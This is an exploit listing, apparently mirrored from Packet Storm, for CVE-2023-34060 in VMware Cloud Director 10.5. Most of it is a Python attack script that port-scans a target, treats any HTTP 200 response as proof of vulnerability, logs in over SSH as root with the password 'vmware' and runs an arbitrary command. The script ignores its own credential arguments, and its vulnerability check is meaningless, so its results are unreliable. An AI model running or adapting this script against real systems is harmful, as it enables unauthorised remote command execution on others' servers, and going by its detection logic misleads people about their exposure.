
VMware Cloud Director 10.5 Authentication Bypass

13 Mar 2024 | Reported by Abdualhadi Khalifa | Type: packetstorm | Source: packetstormsecurity.com

VMware Cloud Director 10.5 authentication bypass exploit for CVE-2023-34060

Code
```python
# Exploit Title: [VMware Cloud Director | Bypass identity verification]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [10.5]
# CVE : [CVE-2023-34060]
import requests
import paramiko
import subprocess
import socket
import argparse
import threading

# Define a function to check if a port is open
def is_port_open(ip, port):
    # Create a socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Set the timeout to 1 second
    s.settimeout(1)
    # Try to connect to the port
    try:
        s.connect((ip, port))
        # The port is open
        return True
    except:
        # The port is closed
        return False
    finally:
        # Close the socket
        s.close()

# Define a function to exploit a vulnerable device
def exploit_device(ip, port, username, password, command):
    # Create a ssh client object
    client = paramiko.SSHClient()
    # Set the policy to accept any host key
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # Connect to the target using the credentials
    client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)
    # Execute the command and get the output
    stdin, stdout, stderr = client.exec_command(command)
    # Print the output
    print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")
    # Close the ssh connection
    client.close()


# Parse the arguments from the user
parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")
parser.add_argument("ip", help="The target IP address")
parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")
parser.add_argument("-u", "--username", default="root", help="The username for ssh")
parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")
parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")
args = parser.parse_args()

# Loop through the ports and check for the vulnerability
for port in args.ports:
    # Check if the port is open
    if is_port_open(args.ip, port):
        # The port is open, send a GET request to the port and check the status code
        response = requests.get(f"http://{args.ip}:{port}")
        if response.status_code == 200:
            # The port is open and vulnerable
            print(f"Port {port} is vulnerable to CVE-2023-34060")
            # Create a thread to exploit the device
            thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))
            # Start the thread
            thread.start()
        else:
            # The port is open but not vulnerable
            print(f"Port {port} is not vulnerable to CVE-2023-34060")
    else:
        # The port is closed
        print(f"Port {port} is closed")
```


Vulners AI Score: 7.4 (High risk)
CVSS 3.1: 9.8
EPSS: 0.00087